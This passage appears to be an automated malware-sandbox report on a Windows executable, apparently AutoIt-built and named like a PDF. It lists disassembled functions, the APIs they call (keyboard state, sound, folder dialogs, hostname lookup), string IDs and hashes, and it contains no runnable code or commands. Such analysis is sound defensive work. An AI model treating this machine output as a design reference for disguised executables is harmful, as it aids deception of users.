                                                    • String ID: 5?
                                                    • API String ID: 1433390588-4033248023
                                                    • Opcode ID: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                                    • Instruction ID: 51a8e0c9e1e1376f81e49eb8a556e714b21f0e68bfef4f14879ff4762fefac8b
                                                    • Opcode Fuzzy Hash: 2213efa76d9335e8ac4805583876b3681709d39251a2085326b969de9fa6dd4a
                                                    • Instruction Fuzzy Hash: 313170B190021AABDB12AF60DD46EBFBBACEF08340F008865F906E6150E734E951DB64
                                                    Function 003825B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B36F4,00000010,?,Bad directive syntax error,003DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003825D6
                                                    • LoadStringW.USER32(00000000,?,003B36F4,00000010), ref: 003825DD
                                                    • _wprintf.LIBCMT ref: 00382610
                                                    • __swprintf.LIBCMT ref: 00382632
                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003826A1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                    • API String ID: 1080873982-4153970271
                                                    • Opcode ID: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                                    • Instruction ID: 5c2710c9e5ffe6eabf9a4907ef39ea0c1bbd638b4ac4d755c447890d46fb2b0d
                                                    • Opcode Fuzzy Hash: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                                    • Instruction Fuzzy Hash: 76212E3191021EBFCF13BB90CC4AEEE7779BF18304F044455F5056A0A2EB75A659DB50
                                                    Function 00387AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00387B42
                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00387B58
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00387B69
                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00387B7B
                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00387B8C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: SendString
                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                    • API String ID: 890592661-1007645807
                                                    • Opcode ID: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                                    • Instruction ID: 40aebea6e854e3eb30376271a99cdf79985711f00e30c51b4c1fa4d8290d4a27
                                                    • Opcode Fuzzy Hash: 249e6d147301ab719f5aabee2efe75357469dfc72c779a1c869b392157d9c388
                                                    • Instruction Fuzzy Hash: 3A11C4B0A5025D79D723B761CC4ADFFBABDEB91B40F100419B511AA0D1DA706A49CAB0
                                                    Function 0038778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • timeGetTime.WINMM ref: 00387794
                                                      • Part of subcall function 0035DC38: timeGetTime.WINMM(?,75C0B400,003B58AB), ref: 0035DC3C
                                                    • Sleep.KERNEL32(0000000A), ref: 003877C0
                                                    • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003877E4
                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00387806
                                                    • SetActiveWindow.USER32 ref: 00387825
                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00387833
                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00387852
                                                    • Sleep.KERNEL32(000000FA), ref: 0038785D
                                                    • IsWindow.USER32 ref: 00387869
                                                    • EndDialog.USER32(00000000), ref: 0038787A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                    • String ID: BUTTON
                                                    • API String ID: 1194449130-3405671355
                                                    • Opcode ID: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                                    • Instruction ID: a86f71a1f049ec1066632c40eefbde938bc9bcef14019cfd6d66270620552d9e
                                                    • Opcode Fuzzy Hash: b53ed391adaff9d10daf6fbcd24959d04cfc4b33101c924defad38df373f3637
                                                    • Instruction Fuzzy Hash: F7211870204305AFE7066F20AD89F263F6EFB4534AF1500B8F91696162CB71AD14DB29
                                                    Function 003902EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0034936C: __swprintf.LIBCMT ref: 003493AB
                                                      • Part of subcall function 0034936C: __itow.LIBCMT ref: 003493DF
                                                    • CoInitialize.OLE32(00000000), ref: 0039034B
                                                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003903DE
                                                    • SHGetDesktopFolder.SHELL32(?), ref: 003903F2
                                                    • CoCreateInstance.OLE32(003CDA8C,00000000,00000001,003F3CF8,?), ref: 0039043E
                                                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003904AD
                                                    • CoTaskMemFree.OLE32(?,?), ref: 00390505
                                                    • _memset.LIBCMT ref: 00390542
                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0039057E
                                                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003905A1
                                                    • CoTaskMemFree.OLE32(00000000), ref: 003905A8
                                                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003905DF
                                                    • CoUninitialize.OLE32(00000001,00000000), ref: 003905E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                    • String ID:
                                                    • API String ID: 1246142700-0
                                                    • Opcode ID: 67a5b753e8404c66bdff9b37371d16291756b45c2987dd2c2db9a3b405393497
                                                    • Instruction ID: f72dcdaa8a45a9fa24cc5f4555f6eede39f270f6f0a4886688de0905a691017e
                                                    • Opcode Fuzzy Hash: 67a5b753e8404c66bdff9b37371d16291756b45c2987dd2c2db9a3b405393497
                                                    • Instruction Fuzzy Hash: E9B1D875A00209AFDB05DFA4C889DAEBBB9FF49304B1584A9F905EB251DB70EE41CF50
                                                    Function 00382E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 00382ED6
                                                    • SetKeyboardState.USER32(?), ref: 00382F41
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00382F61
                                                    • GetKeyState.USER32(000000A0), ref: 00382F78
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00382FA7
                                                    • GetKeyState.USER32(000000A1), ref: 00382FB8
                                                    • GetAsyncKeyState.USER32(00000011), ref: 00382FE4
                                                    • GetKeyState.USER32(00000011), ref: 00382FF2
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0038301B
                                                    • GetKeyState.USER32(00000012), ref: 00383029
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00383052
                                                    • GetKeyState.USER32(0000005B), ref: 00383060
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                                    • Instruction ID: 2d4c0220f3c3a9c572ca3773be57b7c72f2000cdc49e19bcd234cdbf4c5efcc6
                                                    • Opcode Fuzzy Hash: 0a33f44489bf2f98454135eebdae78a479583ee2cd45fe054c493cd942ff1c1c
                                                    • Instruction Fuzzy Hash: 3A51C670A0478429FB37FBA488107ABBBF49F11740F0945DED5C25A6C2DA54AB8CC7A6
                                                    Function 0037ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000001), ref: 0037ED1E
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037ED30
                                                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0037ED8E
                                                    • GetDlgItem.USER32(?,00000002), ref: 0037ED99
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037EDAB
                                                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0037EE01
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037EE0F
                                                    • GetWindowRect.USER32(00000000,?), ref: 0037EE20
                                                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0037EE63
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0037EE71
                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0037EE8E
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0037EE9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                    • String ID:
                                                    • API String ID: 3096461208-0
                                                    • Opcode ID: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                                    • Instruction ID: 9426fd1ef48f60f44216bf33655733ba9623656182c41716dd5fcbeda9460554
                                                    • Opcode Fuzzy Hash: 32fba2a6c71f974b95670cf4d6bd4f62a5f6727540173e6e10933d21908bdbcc
                                                    • Instruction Fuzzy Hash: 5A512DB1B00205AFDB19CF68DD89EAEBBBAEB88300F558579F519D7290D774AD00CB10
                                                    Function 0035B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0035B759,?,00000000,?,?,?,?,0035B72B,00000000,?), ref: 0035BA58
                                                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,0035B72B), ref: 0035B7F6
                                                    • KillTimer.USER32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 0035B88D
                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 003BD8A6
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8D7
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD8EE
                                                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,0035B72B,00000000,?,?,0035B2EF,?,?), ref: 003BD90A
                                                    • DeleteObject.GDI32(00000000), ref: 003BD91C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 641708696-0
                                                    • Opcode ID: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                                    • Instruction ID: ec38a6e1bfc075ea41da1571d9ed2c99e5e4488c14e25ae732340ee18030fb38
                                                    • Opcode Fuzzy Hash: 639ebf97aecceb132ba82a919ac4a806b8156d6196dc025045980327a72c0865
                                                    • Instruction Fuzzy Hash: DC619A30501600DFDB279F18DD88F65B7B9FF84316F16092DE9869AA70C731B898CB44
                                                    Function 0035B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0035B526: GetWindowLongW.USER32(?,000000EB), ref: 0035B537
                                                    • GetSysColor.USER32(0000000F), ref: 0035B438
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: ColorLongWindow
                                                    • String ID:
                                                    • API String ID: 259745315-0
                                                    • Opcode ID: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                                    • Instruction ID: 8de47422931f62ebe96bab2a75d272ace3ad1773602fff74df708fca14600194
                                                    • Opcode Fuzzy Hash: 8d5d10847051e7f2582e6c6ed27fbd251b5d71f43fd050265ab8858df33011dd
                                                    • Instruction Fuzzy Hash: 1241CF70000100AFDB325F29DC89FB97B6AAB06732F198265FEA58E5F2D7309C45CB21
                                                    Function 0038690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                    • String ID:
                                                    • API String ID: 136442275-0
                                                    • Opcode ID: 3e66ce0f8eb2c1c56d03534c053e0118db9c0c6c9ac98d97c991a32a09f1d8c9
                                                    • Instruction ID: 172b8f0b0b992470875c168672c03467b3ad6ea4f77b5167e345f49fa290c677
                                                    • Opcode Fuzzy Hash: 3e66ce0f8eb2c1c56d03534c053e0118db9c0c6c9ac98d97c991a32a09f1d8c9
                                                    • Instruction Fuzzy Hash: 85411EB684521CAECF66EB94DC46DDB73BCEB44300F0041E6F659A6055EA30ABE48F54
                                                    Function 0038D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharLowerBuffW.USER32(003DDC00,003DDC00,003DDC00), ref: 0038D7CE
                                                    • GetDriveTypeW.KERNEL32(?,003F3A70,00000061), ref: 0038D898
                                                    • _wcscpy.LIBCMT ref: 0038D8C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: BuffCharDriveLowerType_wcscpy
                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                    • API String ID: 2820617543-1000479233
                                                    • Opcode ID: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                                    • Instruction ID: 8648b029220d2f3f86706916a2899ce7066e12882fc6b447143395b7ebeae0dd
                                                    • Opcode Fuzzy Hash: 9a6b329c9a36460f638d5eabe0b020b3cec59d4355bb6ab3f0a9e16b994daa62
                                                    • Instruction Fuzzy Hash: B35160351043049FC716FF14D891EAAB7A5EF85314F10896DF99A5B2E2DB31EE09CB42
                                                    Function 0034936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __swprintf.LIBCMT ref: 003493AB
                                                    • __itow.LIBCMT ref: 003493DF
                                                      • Part of subcall function 00361557: _xtow@16.LIBCMT ref: 00361578
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: __itow__swprintf_xtow@16
                                                    • String ID: %.15g$0x%p$False$True
                                                    • API String ID: 1502193981-2263619337
                                                    • Opcode ID: 26eca0a390e8d36b5ebe762e82fb037ad991c071b3c14d6be800218891f7e8b5
                                                    • Instruction ID: 67362f43c870929468d10649dd781117e308f72b893b500282f5ea453fdb795e
                                                    • Opcode Fuzzy Hash: 26eca0a390e8d36b5ebe762e82fb037ad991c071b3c14d6be800218891f7e8b5
                                                    • Instruction Fuzzy Hash: 63410575500204AFDB26DF34D942FBAB7F8EF45304F20446BE64ADB592EA31E941CB14
                                                    Function 003AA1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 003AA259
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 003AA260
                                                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 003AA273
                                                    • SelectObject.GDI32(00000000,00000000), ref: 003AA27B
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 003AA286
                                                    • DeleteDC.GDI32(00000000), ref: 003AA28F
                                                    • GetWindowLongW.USER32(?,000000EC), ref: 003AA299
                                                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003AA2AD
                                                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003AA2B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                    • String ID: static
                                                    • API String ID: 2559357485-2160076837
                                                    • Opcode ID: 17a90e2cd2aecfd371899d6b72444ebdbb0955584261dadb95e35115073238d5
                                                    • Instruction ID: afbf5821ba689a1e536718972d4b33848f4f852453791812b40b4415788d2396
                                                    • Opcode Fuzzy Hash: 17a90e2cd2aecfd371899d6b72444ebdbb0955584261dadb95e35115073238d5
                                                    • Instruction Fuzzy Hash: E7314F32100515ABDF225FA5DC49FEA3B6DFF0A760F110628FA19E61A0C736E821DB65
                                                    Function 00386F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844804053.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1844910280.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_340000_5674656777985-069688574654 pdf.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                    • String ID: 0.0.0.0
                                                    • API String ID: 2620052-3771769585
                                                    • Opcode ID: 863e94ac8e2fd6fc16ebd67b11f122b7ae9934e2b1127143071814ab96ce05cc
                                                    • Instruction ID: cca27b9601a1d8cab78c640ee30c370fb2765821a42d9c2000c0e013e9314405
                                                    • Opcode Fuzzy Hash: 863e94ac8e2fd6fc16ebd67b11f122b7ae9934e2b1127143071814ab96ce05cc
                                                    • Instruction Fuzzy Hash: 3E11B472904215AFCB27BB60AC4BEEA77ACEF41710F0141B5F645EA091EF70EA858B50
                                                    Function 0036500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00365047
                                                      • Part of subcall function 00367C0E: __getptd_noexit.LIBCMT ref: 00367C0E
                                                    • __gmtime64_s.LIBCMT ref: 003650E0
                                                    • __gmtime64_s.LIBCMT ref: 00365116
                                                    • __gmtime64_s.LIBCMT ref: 00365133
                                                    • __allrem.LIBCMT ref: 00365189
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003651A5
                                                    • __allrem.LIBCMT ref: 003651BC
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003651DA
                                                    • __allrem.LIBCMT ref: 003651F1
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0036520F
                                                    • __invoke_watson.LIBCMT ref: 00365280
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1842900685.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                    • Associated: 00000000.00000002.1840896245.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1843067380.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
